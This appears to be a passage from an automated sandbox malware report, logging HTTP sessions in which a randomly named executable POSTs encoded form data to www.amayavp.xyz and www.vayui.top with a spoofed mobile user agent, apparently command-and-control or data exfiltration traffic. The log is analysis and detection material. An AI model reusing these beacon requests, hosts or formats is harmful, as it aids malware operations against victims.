                                                                            Data Ascii: jNn=lCOuZ0pdMNytZWJaHIKfMFBPtGdmxmiuHT1tBv7UXAlcmRoYuCahc3cFQWqrA0J1tPrDNCPaiMQgrNZ4ltNKKcnltpqaBz9M7uSghnUl7IIndMxDEFp0HtQ4DQNpkYzb8KzkkjlLWxSAwqK7lvAFDZElduXm6EBmtIEObH3Jgaw0zJX+3UJ0cGcPNUp4KInpbQAMLdM=
                                                                            Jan 11, 2025 03:31:55.938622952 CET682INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:31:55 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                            Cache-Control: no-cache
                                                                            Content-Encoding: br
                                                                            Data Raw: 31 62 38 0d 0a a1 f0 19 00 20 d3 72 fa fa 72 cc c2 85 08 da 90 94 cc fc b5 fe a6 58 dd 37 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 a9 3b 3d d4 aa 05 f0 93 8a f6 0c 93 99 09 8b b4 bf 80 a0 6e 66 37 66 ca d7 73 29 cb 09 46 ce 22 f2 00 a7 82 fe fc ae bc 1f 32 59 94 a6 28 eb 60 23 48 95 09 ee c0 61 49 7b 4c 24 42 ff 10 f7 c3 ff 14 89 a7 b0 8d d0 01 ae 15 af 3f bf b1 d7 44 eb 5d a3 69 5d 3f 3f 97 42 d1 5f fa 7b fa 17 93 b9 d6 d7 f3 b9 d9 5d ea f0 a5 60 1e 07 0d 21 6e eb bc 6a 37 fd fb b6 57 ed 38 46 21 d6 11 91 b5 ff 6c 7f 5f c2 1c 96 10 a2 f8 e2 52 02 0d 22 22 97 5d f6 86 84 fe d7 db 33 1a a0 ff 80 6d 29 84 35 ca e7 ca 10 42 3d 57 b2 70 92 89 86 f2 56 a8 dc 72 88 b0 b5 79 ad 0a c6 b9 a3 21 84 42 3a a6 14 2f 54 2e 14 15 85 b0 5c b5 8b 7c 80 dc 63 52 14 ce 85 06 e1 5e 98 3c 50 ee 08 25 96 98 a0 4c db e7 d4 d2 11 57 7e e2 b6 8d 9e 00 a6 34 fc fd 5d 86 c5 52 c3 18 69 88 60 e7 af ef 3f 52 1f dc 7c 37 5d 46 0e 53 6c b0 45 28 86 15 88 cc 0f 75 ab [TRUNCATED]
                                                                            Data Ascii: 1b8 rrX7pNN57KNnv=sk%;=nf7fs)F"2Y(`#HaI{L$B?D]i]??B_{]`!nj7W8F!l_R""]3m)5B=WpVry!B:/T.\|cR^<P%LW~4]Ri`?R|7]FSlE(u.5eUGYOny5Xe=M .p-D)<fJZJoQZdV!rP*gf:#0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.849728185.27.134.144805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:31:57.894366026 CET768OUTPOST /d9ku/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.amayavp.xyz
                                                                            Origin: http://www.amayavp.xyz
                                                                            Referer: http://www.amayavp.xyz/d9ku/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 42 63 6e 78 59 59 74 44 61 68 53 58 63 46 62 32 71 55 64 6b 4a 75 74 50 58 78 4e 42 58 61 69 4d 55 67 72 4d 70 34 6c 65 31 4a 4a 73 6e 6e 6b 4a 71 59 65 44 39 4d 37 75 53 67 68 6e 52 79 37 49 51 6e 64 38 42 44 45 6b 70 7a 47 74 51 2f 4a 77 4e 70 32 6f 7a 66 38 4b 7a 47 6b 69 35 31 57 33 57 41 77 72 36 37 67 72 73 47 57 70 45 6a 41 2b 57 44 2b 6d 42 73 67 61 45 61 59 6e 62 7a 6e 72 64 4d 2f 66 6d 55 74 32 42 79 66 47 30 6b 4e 58 42 4f 50 2f 36 42 42 7a 51 38 56 4b 59 44 46 44 45 77 4e 78 53 51 47 5a 62 61 4d 2b 63 33 79 6a 55 4c
                                                                            Data Ascii: jNn=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzBcnxYYtDahSXcFb2qUdkJutPXxNBXaiMUgrMp4le1JJsnnkJqYeD9M7uSghnRy7IQnd8BDEkpzGtQ/JwNp2ozf8KzGki51W3WAwr67grsGWpEjA+WD+mBsgaEaYnbznrdM/fmUt2ByfG0kNXBOP/6BBzQ8VKYDFDEwNxSQGZbaM+c3yjUL
                                                                            Jan 11, 2025 03:31:58.520096064 CET682INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:31:58 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                            Cache-Control: no-cache
                                                                            Content-Encoding: br
                                                                            Data Raw: 31 62 38 0d 0a a1 f0 19 00 20 d3 72 fa fa 72 cc c2 85 08 da 90 94 cc fc b5 fe a6 58 dd 37 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 a9 3b 3d d4 aa 05 f0 93 8a f6 0c 93 99 09 8b b4 bf 80 a0 6e 66 37 66 ca d7 73 29 cb 09 46 ce 22 f2 00 a7 82 fe fc ae bc 1f 32 59 94 a6 28 eb 60 23 48 95 09 ee c0 61 49 7b 4c 24 42 ff 10 f7 c3 ff 14 89 a7 b0 8d d0 01 ae 15 af 3f bf b1 d7 44 eb 5d a3 69 5d 3f 3f 97 42 d1 5f fa 7b fa 17 93 b9 d6 d7 f3 b9 d9 5d ea f0 a5 60 1e 07 0d 21 6e eb bc 6a 37 fd fb b6 57 ed 38 46 21 d6 11 91 b5 ff 6c 7f 5f c2 1c 96 10 a2 f8 e2 52 02 0d 22 22 97 5d f6 86 84 fe d7 db 33 1a a0 ff 80 6d 29 84 35 ca e7 ca 10 42 3d 57 b2 70 92 89 86 f2 56 a8 dc 72 88 b0 b5 79 ad 0a c6 b9 a3 21 84 42 3a a6 14 2f 54 2e 14 15 85 b0 5c b5 8b 7c 80 dc 63 52 14 ce 85 06 e1 5e 98 3c 50 ee 08 25 96 98 a0 4c db e7 d4 d2 11 57 7e e2 b6 8d 9e 00 a6 34 fc fd 5d 86 c5 52 c3 18 69 88 60 e7 af ef 3f 52 1f dc 7c 37 5d 46 0e 53 6c b0 45 28 86 15 88 cc 0f 75 ab [TRUNCATED]
                                                                            Data Ascii: 1b8 rrX7pNN57KNnv=sk%;=nf7fs)F"2Y(`#HaI{L$B?D]i]??B_{]`!nj7W8F!l_R""]3m)5B=WpVry!B:/T.\|cR^<P%LW~4]Ri`?R|7]FSlE(u.5eUGYOny5Xe=M .p-D)<fJZJoQZdV!rP*gf:#0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.849729185.27.134.144805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:32:00.442199945 CET1785OUTPOST /d9ku/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.amayavp.xyz
                                                                            Origin: http://www.amayavp.xyz
                                                                            Referer: http://www.amayavp.xyz/d9ku/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 1240
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 4a 63 6e 43 67 59 74 6b 4f 68 54 58 63 46 48 6d 71 56 64 6b 4a 76 74 50 2b 34 4e 47 66 73 69 50 67 67 35 65 68 34 6a 76 31 4a 65 38 6e 6e 6d 4a 71 62 42 7a 38 49 37 75 43 6b 68 6d 68 79 37 49 51 6e 64 36 6c 44 55 6c 70 7a 45 74 51 34 44 51 4e 31 6b 59 7a 6e 38 4b 62 73 6b 69 73 4f 57 47 71 41 7a 4c 71 37 6e 4f 41 47 4b 35 45 68 54 4f 57 68 2b 6d 4d 32 67 61 5a 68 59 6e 66 5a 6e 6f 4e 4d 37 2f 72 74 2b 6e 4d 71 4d 55 34 36 43 41 5a 66 57 64 4b 59 4a 68 45 45 50 59 51 37 4d 6e 6f 4c 64 78 53 2f 50 4f 36 42 50 61 38 48 6a 57 6f 46 4d 64 7a 68 2f 58 61 38 37 47 70 42 4c 2b 6a 4c 35 71 37 66 30 77 63 4f 2b 6c 75 46 77 6c 49 73 73 4f 58 64 76 56 41 71 4d 67 4e 79 2f 53 51 59 75 6e 6e 75 72 61 70 4b 52 4d 7a 74 36 6e 78 65 2b 6e 48 47 63 47 53 42 42 4b 61 47 4d 58 34 52 4f 47 39 48 70 4c 4e 50 75 68 72 2b 4c 76 69 52 6c 70 57 4b 53 34 49 6c 69 48 74 70 55 56 58 4e 7a 39 [TRUNCATED]
                                                                            Data Ascii: jNn=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzJcnCgYtkOhTXcFHmqVdkJvtP+4NGfsiPgg5eh4jv1Je8nnmJqbBz8I7uCkhmhy7IQnd6lDUlpzEtQ4DQN1kYzn8KbskisOWGqAzLq7nOAGK5EhTOWh+mM2gaZhYnfZnoNM7/rt+nMqMU46CAZfWdKYJhEEPYQ7MnoLdxS/PO6BPa8HjWoFMdzh/Xa87GpBL+jL5q7f0wcO+luFwlIssOXdvVAqMgNy/SQYunnurapKRMzt6nxe+nHGcGSBBKaGMX4ROG9HpLNPuhr+LviRlpWKS4IliHtpUVXNz934+9Pi/udq2eU5x5+9BRxQA6Ms9Q50JU9U4ubXoTFOwWeKWsNFlHfc2IMsH0DbT1Un5Gph91dh/BeEemJOMzbQNGTUtrASbwXZa8HsgBbrnRYIwcilK7vR9U/cXDOyGTdhBIKg+WGgN1jB1++TfOzLNRuQ7ZpWRrCse5GbLc+LCGCIBo4MJmlkRQyjZb3216T96ZlzvA3mTtOudId0gvSJ0WQj13uZ8R1LUrqVirtLSEhHesP7QFw12TLmLoxkuXDs/CblplDvhk5wxLrIqkcnXlZ3f12KJ0NUDU2OHX6U+VLzmyyQhs0bsFazLlD2Uf0As6iBzHzBHYH5CcEagUncB2ib5RZfxLWZ2Ky92+y9Th6x/he6lbzvA6UTU0NTcOhl3ZUFdc0DBjc3G7x3yAzPdtBBf4xUTENSEg4rBVfgs0rjAGHjAbMLb8FMXpAE38e8jU6BPf0TFzVIgRFixtziIArjygT69NrkVgPaRL/2iiUho799dqM/oQyxfv1pmUgdazjHe81UPmh+w6xtTrs1YpegTOb4eI67oeTTBFSEUITqt65fJuPPubclGC8lTVZ+Dkcx7+njDYjMf7UYDnVCuAZdPW1jWjsr6UcSS9jJrQabTZAuRdbAeanHudl8PJrYmDFa42ygWppQudpDmLVUms6acTA32w4H [TRUNCATED]
                                                                            Jan 11, 2025 03:32:01.061295033 CET682INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:32:00 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                            Cache-Control: no-cache
                                                                            Content-Encoding: br
                                                                            Data Raw: 31 62 38 0d 0a a1 f0 19 00 20 d3 72 fa fa 72 cc c2 85 08 da 90 94 cc fc b5 fe a6 58 dd 37 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 a9 3b 3d d4 aa 05 f0 93 8a f6 0c 93 99 09 8b b4 bf 80 a0 6e 66 37 66 ca d7 73 29 cb 09 46 ce 22 f2 00 a7 82 fe fc ae bc 1f 32 59 94 a6 28 eb 60 23 48 95 09 ee c0 61 49 7b 4c 24 42 ff 10 f7 c3 ff 14 89 a7 b0 8d d0 01 ae 15 af 3f bf b1 d7 44 eb 5d a3 69 5d 3f 3f 97 42 d1 5f fa 7b fa 17 93 b9 d6 d7 f3 b9 d9 5d ea f0 a5 60 1e 07 0d 21 6e eb bc 6a 37 fd fb b6 57 ed 38 46 21 d6 11 91 b5 ff 6c 7f 5f c2 1c 96 10 a2 f8 e2 52 02 0d 22 22 97 5d f6 86 84 fe d7 db 33 1a a0 ff 80 6d 29 84 35 ca e7 ca 10 42 3d 57 b2 70 92 89 86 f2 56 a8 dc 72 88 b0 b5 79 ad 0a c6 b9 a3 21 84 42 3a a6 14 2f 54 2e 14 15 85 b0 5c b5 8b 7c 80 dc 63 52 14 ce 85 06 e1 5e 98 3c 50 ee 08 25 96 98 a0 4c db e7 d4 d2 11 57 7e e2 b6 8d 9e 00 a6 34 fc fd 5d 86 c5 52 c3 18 69 88 60 e7 af ef 3f 52 1f dc 7c 37 5d 46 0e 53 6c b0 45 28 86 15 88 cc 0f 75 ab [TRUNCATED]
                                                                            Data Ascii: 1b8 rrX7pNN57KNnv=sk%;=nf7fs)F"2Y(`#HaI{L$B?D]i]??B_{]`!nj7W8F!l_R""]3m)5B=WpVry!B:/T.\|cR^<P%LW~4]Ri`?R|7]FSlE(u.5eUGYOny5Xe=M .p-D)<fJZJoQZdV!rP*gf:#0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.849730185.27.134.144805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:32:02.989187956 CET489OUTGET /d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K9aiv+zbDkEKhMSDsVMvwPhhINhuEU9ODct9Lj1wj6urmQ==&3P=ZxaxIFQ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.amayavp.xyz
                                                                            Connection: close
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Jan 11, 2025 03:32:03.584242105 CET1180INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:32:03 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 979
                                                                            Connection: close
                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                            Cache-Control: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                            Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("188cce714d5a0e24c121b1ae9afd02b2");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K9aiv+zbDkEKhMSDsVMvwPhhINhuEU9ODct9Lj1wj6urmQ==&3P=ZxaxIFQ&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.849731104.21.95.160805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:32:08.983369112 CET742OUTPOST /vg0z/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.vayui.top
                                                                            Origin: http://www.vayui.top
                                                                            Referer: http://www.vayui.top/vg0z/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 71 56 57 64 4e 35 42 6a 6a 4b 4f 39 47 43 38 73 4d 57 78 4d 39 69 44 32 34 50 5a 2f 53 43 30 51 43 58 38 57 6b 6a 58 38 43 72 30 72 4c 50 41 41 44 70 47 6e 57 6b 65 7a 56 4d 4b 39 39 64 7a 37 32 56 5a 30 32 64 6b 51 61 43 4b 33 72 34 61 56 6a 59 70 73 69 4f 37 55 67 6a 6c 56 6f 69 62 46 34 7a 55 65 2b 61 39 76 77 59 48 6a 52 4f 6c 75 35 41 67 5a 75 77 4b 66 4f 41 43 45 5a 61 76 37 65 51 51 2f 50 66 61 58 4c 4a 37 36 69 43 2b 54 33 42 44 56 6d 57 52 4d 4b 32 70 68 7a 56 5a 7a 65 37 70 30 6d 39 56 64 5a 73 65 63 51 63 47 53 45 6a 30 30 61 68 35 4a 71 77 3d
                                                                            Data Ascii: jNn=27GE0W46HILaWqVWdN5BjjKO9GC8sMWxM9iD24PZ/SC0QCX8WkjX8Cr0rLPAADpGnWkezVMK99dz72VZ02dkQaCK3r4aVjYpsiO7UgjlVoibF4zUe+a9vwYHjROlu5AgZuwKfOACEZav7eQQ/PfaXLJ76iC+T3BDVmWRMK2phzVZze7p0m9VdZsecQcGSEj00ah5Jqw=
                                                                            Jan 11, 2025 03:32:09.560853004 CET808INHTTP/1.1 404 Not Found
                                                                            Date: Sat, 11 Jan 2025 02:32:09 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nQpzubfE7qDjNsccnRBOi91m%2F830GH6MVHFluiwayqpVG0TZlnjwobWd9vErmg0KUCPl6zRsX%2Fg9tx%2B697jRxTuy5g0n2RTdT69UejvYG0F77lZu8%2FuGOjRsoUu2Gr31"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90017ea29cea80dc-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=742&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                            Data Ascii: f
                                                                            Jan 11, 2025 03:32:09.561559916 CET110INData Raw: 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9
                                                                            Data Ascii: 63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.849732104.21.95.160805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:32:11.536220074 CET762OUTPOST /vg0z/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.vayui.top
                                                                            Origin: http://www.vayui.top
                                                                            Referer: http://www.vayui.top/vg0z/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 6d 30 51 6d 62 38 59 46 6a 58 31 53 72 30 6b 72 50 59 4f 6a 70 50 6e 57 59 38 7a 58 49 4b 39 35 4e 7a 37 30 4e 5a 30 6e 64 6c 53 4b 43 45 73 62 34 63 62 44 59 70 73 69 4f 37 55 6b 4b 74 56 70 4b 62 46 49 44 55 65 66 61 2b 77 41 59 47 69 52 4f 6c 2f 70 41 6b 5a 75 78 5a 66 4b 42 6e 45 62 69 76 37 61 63 51 2b 64 33 5a 65 4c 4a 35 35 53 44 39 44 55 30 6d 62 32 43 65 43 38 36 38 76 79 6c 73 37 49 4b 44 75 45 31 54 65 5a 45 31 63 54 30 77 58 7a 2b 63 75 35 78 4a 58 39 6c 4f 39 4b 4a 55 6f 6e 46 5a 70 44 64 2b 6c 64 2f 52 39 45 55 36
                                                                            Data Ascii: jNn=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hm0Qmb8YFjX1Sr0krPYOjpPnWY8zXIK95Nz70NZ0ndlSKCEsb4cbDYpsiO7UkKtVpKbFIDUefa+wAYGiROl/pAkZuxZfKBnEbiv7acQ+d3ZeLJ55SD9DU0mb2CeC868vyls7IKDuE1TeZE1cT0wXz+cu5xJX9lO9KJUonFZpDd+ld/R9EU6
                                                                            Jan 11, 2025 03:32:12.139859915 CET916INHTTP/1.1 404 Not Found
                                                                            Date: Sat, 11 Jan 2025 02:32:12 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W34E5nxdZdtBhfjX%2BmpzPfHvbzTdLG2KayogoGRoOS0%2BwkxY8%2FG%2Bc30IqOSkUhoY3mLrrtZcILceD1k2%2Famu%2BMvBgQFoc%2BkDaie7qxDVyuG154v0Ptzs6EqXJ%2B2i7bs0"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90017eb29c0c43be-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1985&rtt_var=992&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.2.849733104.21.95.160805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:32:14.079730988 CET1779OUTPOST /vg0z/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.vayui.top
                                                                            Origin: http://www.vayui.top
                                                                            Referer: http://www.vayui.top/vg0z/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 1240
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
